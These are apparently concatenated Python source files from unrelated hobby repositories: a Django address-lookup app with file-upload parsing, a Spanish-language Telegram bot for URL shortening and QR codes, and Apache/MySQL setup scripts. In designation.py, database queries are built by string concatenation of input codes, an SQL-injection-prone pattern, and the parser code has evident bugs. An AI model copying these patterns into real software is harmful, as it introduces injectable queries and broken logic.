# FileDumpParser import csv import os import zipfile import sys import io import glob import pyap import docx import codecs class FileDumpParser: def __init__(self): self.og = os.getcwd() self.debug = False def __init__(self, d): self.og = os.getcwd() self.debug = d def unzip(self, file): if(self.debug): cwd = os.path.join(self.og, "ZipFIles") print(cwd) if(os.path.isdir(file.name[:-4])): print("directory already exists") return "fuck" cwd = self.og os.chdir(cwd) # change directory from working dir to dir with files ret = '' if(zipfile.is_zipfile(file)): print("is zip") with zipfile.ZipFile(file, "r") as zip_ref: ret = zip_ref.extractall(cwd) zip_ref.close() # close file else: print(file, "is not an existing Zipfile!") ret = file.name[:-4] return ret def parseCSV(self, file): # file = "CVSFiles/"+ if(self.debug): cwd = os.path.join(self.og, "mysite/CSVFiles") print(cwd) # os.chdir(cwd) addy_List = [] noAddyList = [] decoded_file = file.read().decode('utf-16') io_string = io.StringIO(decoded_file) line_count = 0 for row in csv.reader(io_string, delimiter=',', quotechar='|'): if(row == []): print(addy_List) print("\n\nNO ADDR LIST \n\n\n\n") print(noAddyList) ret = [addy_List, noAddyList] return ret print(line_count) if line_count == 0: print('Column names are {", ".join(row)}') elif row[3] != "Rejected": if(row[4] != ""): tl = [row[0], row[4]] addy_List.append(tl) else: tl = [row[0]] noAddyList.append(tl) line_count += 1 print(addy_List) print("\n\nNO ADDR LIST \n\n\n\n") print(noAddyList) ret = [addy_List, noAddyList] return ret def Address_Search(self, test_address): # NOT in use addresses = pyap.parse(test_address, country='US') for address in addresses: # shows found address print(address) # shows address parts print(address.as_dict()) def Docx_to_Text(self, filename): # not in use noaddylist = [] addylist = [] if(self.debug): #cwd = os.path.join(self.og, "CSVFiles") cwd = self.og print(cwd) print(os.path.isfile(filename)) doc = docx.Document(filename) fullText = [] store ="" for para in doc.paragraphs: tmp = para.text print(str(para.text), "this is teh paragraph") store = store + "\n" + tmp addresses = [] addresses = pyap.parse(store, country='US') # print(addresses) addy = [] for address in addresses: addy.append(str(address)) if(addy == []): print(addy[0], "no addres!") tlist = [filename] noaddylist.append(file) else: print(addy[0], "found address with name", filename) tlist = [filename, addy[0]] addylist.append(tlist) ret = [addylist, noaddylist] print(ret, "= ret") return ret def read_through_folder(self, filename): ret = [] if(self.debug): cwd = os.path.join(self.og, "CSVFiles") print(filename, " is path?: ",os.path.isdir(filename)) cwd = os.path.join(self.og, filename) os.chdir(cwd) print(cwd) for file in glob.glob('*.txt'): ret.append(file) return ret def Text_to_String(self, filename): ret = [] noaddylist = [] addylist = [] if(self.debug): cwd = os.path.join(self.og, "CSVFiles") print(os.path.isdir(filename)) print(filename) cwd = os.path.join(self.og, filename) os.chdir(cwd) print(cwd) for file in glob.glob('*.txt'): temp = open(file, 'r').read().strip() addresses = [] addresses = pyap.parse(temp, country='US') # print(addresses) addy = [] for address in addresses: addy.append(str(address)) if(addy == []): print(addy[0], "no addres!") tlist = [file] noaddylist.append(file) else: print(addy[0], "found address with name", file) tlist = [file, addy[0]] addylist.append(tlist) os.remove(file) ret = [addylist, noaddylist] print(ret, "= ret") cwd = os.chdir("../") print(cwd) os.rmdir(filename) return ret # TEST Cases # heheheheh "bigdumper" .... much funny bigdumper = FileDumpParser(True) print("Testing...\n") print(bigdumper.Docx_to_Text("test1.docx")) # print(bigdumper.unzip("Test1.zip")) #bigdumper.Address_Search( bigdumper.Text_to_Sting("test1.txt"))
B-Rad80/code-components
mysite/accounts/views.py
from django.shortcuts import render # Create your views here. def signup(request): return render(request, 'app/signup.html') def signin(request): return render(request, 'app/signup.html')
B-Rad80/code-components
designation.py
<reponame>B-Rad80/code-components<gh_stars>0 import psycopg2 import os def getDesignation(countyCode,tractCode): #if type(countyCode) != str or type(tractCode): #if addr is not a string, throws error # raise ValueError('countyCode and tractCode must be type str') # DATABASE_URL = os.environ['DATABASE_URL'] #conn = psycopg2.connect(DATABASE_URL, sslmode='require') conn = psycopg2.connect(database="hub_designations", user="hub", password="<PASSWORD>", host="127.0.0.1", port="5432") #specifies connection details cur = conn.cursor() #Creates cursor, which establishes connection #Creates dictionary to hold results. This is conviniently the same format as the dictionary in getInHub.py info = { 'county':{ 'name':"", 'prevYearDes':False, 'currYearDes':False, 'prevYearReason':"", 'currYearReason':""}, 'tract':{ 'prevYearDes':False, 'currYearDes':False} } #Puts single quotes around codes, for correct formatting of SELECT operations below countyCode = "'" + countyCode + "'" tractCode = "'" + tractCode + "'" #Executes SELECT operations on the database for designations and county name cur.execute("select county_name FROM county_designations WHERE county_code = " + countyCode) info['county']['name'] = cur.fetchall()[0][0] cur.execute("select july_2017_status FROM county_designations WHERE county_code = " + countyCode) cPrev = cur.fetchall()[0][0] cur.execute("select january_2018_status FROM county_designations WHERE county_code = " + countyCode) cCurr = cur.fetchall()[0][0] cur.execute("select january_2017_status FROM tract_designations WHERE tract_code = " + tractCode) tPrev = cur.fetchall()[0][0] cur.execute("select january_2018_status FROM tract_designations WHERE tract_code = " + tractCode) tCurr = cur.fetchall()[0][0] #Decides wether to add reason and decide if qualified. There are three #possible states for county designation. "Not Qualified", "Qualified by ...", # and "Redesignated until..." #This will set reason to the description given by the database if the state #is Qualified or Redesignated, but will leave reason blank if state is #Not Qualified. It will set the designation to True only if state is Qualified. if "Not" not in cPrev: info['county']['prevYearReason'] = cPrev if 'Qualified' in cPrev: info['county']['prevYearDes'] = True if "Not" not in cCurr: info['county']['currYearReason'] = cCurr if 'Qualified' in cCurr: info['county']['currYearDes'] = True #This sets the designation for tract designations if 'Qualified' in tPrev and "Not" not in tPrev: info['tract']['prevYearDes'] = True if 'Qualified' in tCurr and "Not" not in tCurr: info['tract']['currYearDes'] = True #This would commit changes made by operations, but since we're only doing #select operations, it's unnecesary. #conn.commit() conn.close() #Closes connection with database return info #returns the dictionary
B-Rad80/code-components
hubQuery/views.py
<filename>hubQuery/views.py from django.shortcuts import render from django.shortcuts import render_to_response from django.http import HttpResponseRedirect from .forms import queryForm, massForm, FileForm from django.conf import settings from django.core.files.storage import FileSystemStorage import getInHub import FileDumpParser import os # Create your views here. def hubQuery(request): # if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = queryForm(request.POST) # check whether it's valid: if form.is_valid(): # process the data in form.cleaned_data as required addr_in = form.cleaned_data['addr_in'] loc = getInHub.location(addr_in) # redirect to a new URL: return render(request, 'app/queryResponse.html', {'reqSuccess':True, 'loc':loc}) else: return render(request, 'app/queryResponse.html') # if a GET (or any other method) we'll create a blank form else: #form = TestForm() return render(request, 'app/queryResponse.html') def massQuery(request): # if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = massForm(request.POST) # check whether it's valid: if form.is_valid(): addr1 = form.cleaned_data['addr_in'] addr2 = form.cleaned_data["addr_in2"] name1 = form.cleaned_data['name_in'] name2 = form.cleaned_data['name_in2'] addresses = [[addr1, name1], [addr2, name2]] """ Above is just a temporary proof of concept for processing form. To implement mass drop, need to replace form and processing in: - forms.py - massResponse.html - here Pass a list of lists of addresses and names as shown above """ locList = [] for address in addresses: loc = getInHub.location(address[0]) loc.setName(address[1]) locList.append(loc) # redirect to a new URL: return render(request, 'app/massResponse.html', {'reqSuccess':True, 'locList':locList}) # if a GET (or any other method) we'll create a blank form else: return render(request, 'app/massResponse.html') def fileQuery(request): # if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = FileForm(request.POST, request.FILES) # check whether it's valid: if form.is_valid(): print("form is valid!") data = form.cleaned_data['data'] print(data.name) print(data.size) data_type = form.cleaned_data['data_type'] data_zip = form.cleaned_data['data_zip'] export = form.cleaned_data['export'] print(data, data_type, data_zip, export) """ Above is just a temporary proof of concept for processing form. To implement mass drop, need to replace form and processing in: - forms.py - massResponse.html - here Pass a list of lists of addresses and names as shown above """ addresses=[] parse_boi = FileDumpParser.FileDumpParser(False) if(data_type == "1"): print("type = CSV") if(data_zip == "1"): print('Its Zipped!') else: print('Not Zipped') print('parsing') addresses = parse_boi.parseCSV(data) elif(data_type == "2"): print("type == Docx") if(data_zip == "1"): print('Its Zipped!') tmp = parse_boi.unzip(data) addresses = parse_boi.Text_to_String(tmp) else: print('Not Zipped') elif(data_type == "3"): print("Fuck, I Havent implemented this yet") if(data_zip == "1"): print('Its Zipped!') else: print('Not Zipped') if(export == "1"): print("no export yet fam") else: print("cool bc I have yet to do this") locList = [] if(addresses != []): for address in addresses[0]: print(address[0]) print(address[1], "\n\n") loc = getInHub.location(address[1]) loc.setName(address[0]) locList.append(loc) # redirect to a new URL: return render(request, 'app/fileDropResponse.html', {'reqSuccess':True, 'locList':locList, 'noaddr':addresses[1]}) else: return render(request, 'app/fileDropResponse.html', {'invalid':True}) # if a GET (or any other method) we'll create a blank form else: return render(request, 'app/fileDropResponse.html')
B-Rad80/code-components
hubQuery/apps.py
from django.apps import AppConfig class hubQueryConfig(AppConfig): name = 'hubQuery'
B-Rad80/code-components
hubQuery/forms.py
<filename>hubQuery/forms.py from django import forms class queryForm(forms.Form): addr_in = forms.CharField(label='addr in', max_length=100) class massForm(forms.Form): addr_in = forms.CharField(label='addr in', max_length=100) addr_in2 = forms.CharField(label='addr in', max_length=100) name_in = forms.CharField(label='addr in', max_length=100) name_in2 = forms.CharField(label='addr in', max_length=100) class FileForm(forms.Form): YoN_CHOICES = ( (1, ("yes")), (2, ("no")) ) TYPE_CHOICES = ( (1, ("CVS")), (2, ("Docx")), (3, ("Automatic")) ) data = forms.FileField() #status = forms.ChoiceField(choices = YoN_CHOICES, label="", initial='', widget=forms.Select(), required=True) #relevance = forms.ChoiceField(choices = TYPE_CHOICES, required=True) data_type = forms.ChoiceField(choices=TYPE_CHOICES) data_zip = forms.ChoiceField(choices=YoN_CHOICES) export = forms.ChoiceField(choices=YoN_CHOICES)
B-Rad80/code-components
polls/urls.py
<reponame>B-Rad80/code-components<filename>polls/urls.py """urls.py """ from django.urls import path from . import views urlpatterns = [ path('', views.index, name='index'), ]
B-Rad80/code-components
mysite/urls.py
<gh_stars>0 """mysite URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.1/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from django.urls import include, path from django.views.generic import TemplateView from accounts import views as accounts_views from boards import views from hubQuery import views as hubQuery_views urlpatterns = [ url(r'^$', views.home, name='home'), url(r'^aboutUs/$', views.aboutUs, name='aboutUs'), #url(r'^$', TemplateView.as_view(template_name='menu.html')), url(r'^signup/$', accounts_views.signup, name='signup'), url(r'^signin/$', accounts_views.signin, name='signin'), path('polls/', include('polls.urls')), url(r'^hubQuery/$', hubQuery_views.hubQuery, name='hubQuery'), url(r'^massQuery/$', hubQuery_views.massQuery, name='massQuery'), url(r'^fileQuery/$', hubQuery_views.fileQuery, name='fileQuery'), path('admin/', admin.site.urls), ]
B-Rad80/code-components
boards/views.py
from django.shortcuts import render # Create your views here. from django.shortcuts import render_to_response def home(request): return render_to_response('app/menu.html') def aboutUs(request): return render_to_response('app/about.html')
B-Rad80/code-components
getInHub_test.py
<reponame>B-Rad80/code-components #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ getInHub.py testing file """ import unittest import getInHub import requests import simplejson as json import designation class TextprocTestCase(unittest.TestCase): @classmethod def setUpClass(cls): pass @classmethod def tearDownClass(cls): pass def setUp(self): pass def tearDown(self): pass def test_init(self): Brandon = int(5) Maxine = "805 29th Street Boulder, CO" #q = getInHub.location() #print(getInHub.location(Brandon).addressString, "is the addressString") self.assertRaises(ValueError, getInHub.location,Brandon) # self.assertEqual(getInHub.location(Brandon), Brandon, "'text' does not match input") # self.assertEqual(getInHub.location(Maxine), Maxine, "'text' does not match input") def test_constructor(self): a = 1 b = ["cow", "dog"] self.assertRaises(Exception, lambda : testproc.Processor(a, b)) def test_getCT(self): # Brandon case CTtest1 = {'error':False, 'errorText':"", 'tract':'08013012607', 'county':'08013'} # Maxine case CTtest2 = {'error':False, 'errorText':"", 'tract':'26049011714', 'county':'26049'} test_CT1 = getInHub.getCT('40.002550','-105.256470') test_CT2 = getInHub.getCT('43.039140','-83.542910') self.assertDictEqual(test_CT1, CTtest1, "Brandon test case failed") self.assertDictEqual(test_CT2, CTtest2, "Maxine test case failed") #self.addTypeEqualityFunc(typeobj, function) def test_getCoord(self): TestDict1 = { 'error':False, 'errorText':"", 'lat':40.0023989, 'lng':-105.256342, 'faddr':'805 29th St, Boulder, CO 80303, USA', 'country':'US'} Ctest1 =getInHub.getCoord("805 29th Street Boulder, CO") self.assertDictEqual(TestDict1,Ctest1, "Dicts where not the same") #self.assertEqual(x.count(), y, "count() function failed") ''' def test_count_alpha(self): x = textproc.Processor('HiPPOpotaMUS') y = len('HiPPOpotaMUS') self.assertEqual(x.count_alpha(), y, "count_alpha() function failed") #assert x.count_alpha() == y def test_count_numeric(self): m = textproc.Processor('00987654321') n = len('00987654321') self.assertEqual(m.count_numeric(), n, "count_numeric() function failed") #assert x.count_numberic() == y def test_count_vowels(self): p = textproc.Processor('aeiouAEIOU') q = len('aeiouAEIOU') self.assertEqual(p.count_vowels(), q, "count_vowels() function failed") def test_is_phonenumber(self): test_phone_numbers = ['970-226-5150', '303.735.5880'] for number in test_phone_numbers: p = textproc.Processor(number) self.assertTrue(p.is_phonenumber(), "is_phonenumber() function failed") #more fun with list comprehensions - filtering on the fly: #a = [1,2,3,5] #[i for i in a if i*i > 4] #[3, 5] # #for number in test_phone_numbers: # list_textprocs = [textproc.Processor(number) for number in test_phone_numbers] # [self.assertTrue(p.is_phonenumber(), "is_phonenumber() function failed") for p in list_textprocs] # Add Your Test Cases Here... ''' #test_getCT(self) # Main: Run Test Cases if __name__ == '__main__': unittest.main()
GH0STsama/GhostNoobBot
noob.py
<reponame>GH0STsama/GhostNoobBot from telethon import TelegramClient, Button from telethon.events import NewMessage from telethon.tl.custom import Message from pyshorteners import Shortener from os import getenv, path, makedirs from qrcode import make from yarl import URL try: from secure import * API_ID = API_ID API_HASH = API_HASH BOT_TOKEN = BOT_TOKEN except: API_ID = int(getenv("API_ID")) API_HASH = getenv("API_HASH") BOT_TOKEN = getenv("NOOB_BOT_TOKEN") bot = TelegramClient("noob_bot", API_ID, API_HASH).start(bot_token = BOT_TOKEN) conversation_state = {} # Parsea el nombre y elimina los caracteres invalidos async def invalid_characters(fname: str) -> str: fname = fname.replace("<", "") fname = fname.replace(":", "") fname = fname.replace(">", "") fname = fname.replace("/", "") fname = fname.replace("/", "") fname = fname.replace("?", "") fname = fname.replace("*", "") fname = fname.replace('"', "'") fname = fname.replace("|", " ") return fname # Generar QR a partir de un texto y devuelve la ruta de la imagen generada async def generate_qr(text: str, user_id: int): user_path = "./" + str(user_id) if not path.exists(user_path): makedirs(user_path) qr_path = "./{0}/{1}.jpg".format(str(user_id), await invalid_characters(text)) img = make(text) img.save(qr_path) await bot.send_file(user_id, qr_path, caption = text + "\n\nQR generado por @GhostNoobBot ๐Ÿ‘ป") # Procesa el enlace usando multiples acortadores async def short_url(url: str) -> str: shorten_urls = "" s = Shortener() try: url = s.chilpit.short(url) shorten_urls += f"\n**Chilp.it :-** {url}" except: pass try: url = s.clckru.short(url) shorten_urls += f"\n**Clck.ru :-** {url}" except: pass try: url = s.dagd.short(url) shorten_urls += f"\n**Da.gd :-** {url}" except: pass try: url = s.gitio.short(url) shorten_urls += f"\n**Git.io :-** {url}" except: pass try: url = s.isgd.short(url) shorten_urls += f"\n**Is.gd :-** {url}" except: pass try: url = s.osdb.short(url) shorten_urls += f"\n**Osdb.link :-** {url}" except: pass try: url = s.qpsru.short(url) shorten_urls += f"\n**Qps.ru :-** {url}" except: pass try: url = s.tinyurl.short(url) shorten_urls += f"\n**TinyURL.com :-** {url}" except: pass try: s = Shortener(domain='https://0x0.st') url = s.nullpointer.short(url) shorten_urls += f"\n**0x0.st :-** {url}" except: pass try: s = Shortener(domain='https://ttm.sh') url = s.nullpointer.short(url) shorten_urls += f"\n**ttm.sh :-** {url}" except: pass return shorten_urls async def short_process(url: str, event: Message): if URL(url).scheme and URL(url).host: msg: Message = await event.reply("Por favor espere..") try: shorten = await short_url(url) await msg.delete() except: await event.reply("โŒ Ocurrio un error inesperado.") return else: await event.reply("โŒ Ingrese una URL vรกlida.") return message_caption = "๐Ÿค– Ghost Noob Bot:\nAqui esta su enlace acortado multiples acortadores, elija a su preferencia! ๐Ÿ‘\n{0}\n\nEnlace acortado por @GhostNoobBot" await bot.send_file(event.sender_id, "./noob.jpg", caption = message_caption.format(shorten)) @bot.on(NewMessage()) async def message_handler(event: Message): id = event.sender_id state = conversation_state.get(id) if event.raw_text.lower() == "/start": await bot.send_file(event.sender_id, "./noob.jpg", caption = "<b>GhostNoobBot:</b>\n\n" f'Hola <a href="tg://user?id={event.sender_id}">{event.sender.first_name}</a>, soy un bot capaz de acortar enlaces y generar codigos QR a partir de texto, puedo ayudar en algo?\n\n/qr - Generar codigo QR a partir de un texto\n/short - Acortar un enlace', parse_mode = "html", buttons = [ [Button.url("๐Ÿ‘ป Canal", "https://t.me/GhostOpenSource"), Button.url("๐Ÿ’ณ Donar", "https://qvapay.com/payme/ghostsama")], [Button.url("๐Ÿ‘พ GitHub", "https://github.com/GH0STsama/GhostNoobBot")]]) return SHORT_LINK = 0 if state is None and event.raw_text.startswith("/short"): if event.raw_text == "/short": await event.reply("๐Ÿ”— Deme un enlace para acortar.") conversation_state[id] = SHORT_LINK elif event.raw_text.startswith("/short"): url = event.raw_text[6:] if url.startswith(" "): url = url[1:] await short_process(url, event) return if state == SHORT_LINK: del conversation_state[id] await short_process(event.raw_text, event) return QR_CODE = 1 if state is None and event.text.startswith("/qr"): if event.raw_text == "/qr": await event.reply("โœ๏ธ Enviame un texto.") conversation_state[id] = QR_CODE return elif event.raw_text.startswith("/qr"): await generate_qr(event.raw_text[3:], event.sender_id) if state == QR_CODE: if event.text: await generate_qr(event.raw_text, event.sender_id) else: await event.reply("โŒ Error al generar el codigo QR") del conversation_state[id] return print("Noob Iniciado!") bot.run_until_disconnected()
milos85vasic/Apache-Factory-Toolkit
main_proxy.py
import json import getpass import sys from commands import * from configuration import * from system_configuration import * account = getpass.getuser() if sys.argv.__len__() >= 2: account = sys.argv[1] print("Account passed as parameter: " + account) system_configuration = get_system_configuration() scheduled_for_restart = [] if account in system_configuration: if key_services in system_configuration[account]: if key_services in system_configuration[account][key_services]: for service in system_configuration[account][key_services][key_services]: if key_configuration_main_proxy in service: bind_to_account = service[key_configuration_main_proxy] scheduled_for_restart.append(bind_to_account) destination_directory = get_home_directory_path( bind_to_account) + "/" + apache2 + "/" + apache_vhosts_directory url = service[key_services_url] urls = [url] if key_services_urls in service: urls.extend(service[key_services_urls]) if key_service_root in service: root = service[key_service_root] destination_file = destination_directory + "/" + url + ".conf" if not os.path.isfile(destination_file): try: with open(destination_file, 'w') as outfile: port = str(system_configuration[account][key_configuration_port]) for url in urls: outfile.write("\n") outfile.write("<VirtualHost *:80>") outfile.write("\n") outfile.write("\tProxyPreserveHost On") outfile.write("\n") outfile.write("\tProxyPass / http://127.0.0.1:" + port + "/") outfile.write("\n") outfile.write("\tProxyPassReverse / http://127.0.0.1:" + port + "/") outfile.write("\n") outfile.write("\tServerName " + url) outfile.write("\n") outfile.write("</VirtualHost>") outfile.write("\n") except IOError: print("Can't access [2]: " + destination_file) else: print("Virtual host configuration already exist: " + destination_file) else: print("No root for: " + url) else: print("No account '" + account + "' in system configuration.") for scheduled in scheduled_for_restart: steps = [ run_as_su( get_home_directory_path(scheduled) + "/" + apache2 + "/bin/apachectl restart" ) ] run(steps)
milos85vasic/Apache-Factory-Toolkit
websetup_run.py
<reponame>milos85vasic/Apache-Factory-Toolkit import sys from commands import * from configuration import * branch = "master" if __name__ == '__main__': what = sys.argv[1] if len(sys.argv) >= 3: branch = sys.argv[2] if what == apache_factory: print("Apache server factory application recognized.") steps = [ run_as_su( concatenate( cd("/root"), mkdir(apache_factory), cd(apache_factory), git_clone_to_recursive_submodules("https://github.com/milos85vasic/Apache-Factory.git"), git_checkout(branch) ) ) ] run(steps) exit() if what == pyramid_factory: print("Pyramid factory application recognized.") steps = [ run_as_su( concatenate( cd("/root"), mkdir(pyramid_factory), cd(pyramid_factory), git_clone_to_recursive_submodules("https://github.com/milos85vasic/Pyramid-Factory.git"), git_checkout(branch) ) ) ] run(steps) exit() if what == mail_server_factory: print("Mail server factory application recognized.") steps = [ run_as_su( concatenate( cd("/root"), mkdir(mail_server_factory), cd(mail_server_factory), git_clone_to_recursive_submodules("https://github.com/milos85vasic/Mail-Server-Factory"), git_checkout(branch) ) ) ] run(steps) exit() print("Not recognized: " + what) exit(1)
milos85vasic/Apache-Factory-Toolkit
wipe.py
import os import sys source_file = "" destination_file = "" replacements = [] for arg in sys.argv: index = sys.argv.index(arg) if index == 1: source_file = arg if index == 2: destination_file = arg if index >= 3: replacements.append(arg) if os.path.isfile(source_file): print("Wiping:") print("From: " + source_file) print("Into: " + destination_file) replace_what = [] replace_with = [] for x in range(0, replacements.__len__()): if x % 2 == 0: replace_what.append(replacements[x]) else: replace_with.append(replacements[x]) with open(source_file, "rt") as fin: with open(destination_file, "wt") as fout: for line in fin: replaced = line for x in range(0, replacements.__len__() / 2): replaced = replaced.replace(replace_what[x], replace_with[x]) fout.write(replaced) print("-----")
milos85vasic/Apache-Factory-Toolkit
mysql_common.py
import sys from .commands import * from .mysql_common_5560 import * mysql_init_tmp = "init.tmp" def get_account_from_sys_argv(): return sys.argv[1] def user_home(): return get_home_directory_path(get_account_from_sys_argv()) def get_mysql_bin_directory(): # MySQL 8.0: # return user_home() + "/" + mysql + "/" + mysql_installation_dir + "/usr/local/mysql/bin" # MySQL 5.5.60: return user_home() + "/" + mysql + "/" + mysql_bin_dir def get_mysql_logs_directory(): return user_home() + "/" + mysql + "/" + mysql_log_dir def get_start_command(account_home): return "/mysqld --defaults-extra-file=" + account_home + "/" + mysql + "/" + mysql_conf_dir + "/my.cnf &" def get_start_command_init(account_home): return "/mysqld --defaults-extra-file=" + account_home + "/" + mysql + "/" + mysql_conf_dir \ + "/my.cnf --init-file=" + account_home + "/" + apache_factory + "/" + mysql_init_tmp + " &" # MySQL 8.0: def initialize_mysql_8(): return "/mysqld --defaults-file=" + user_home() + "/" + mysql + "/" + mysql_conf_dir + \ "/my.cnf --initialize --user=" + get_account_from_sys_argv()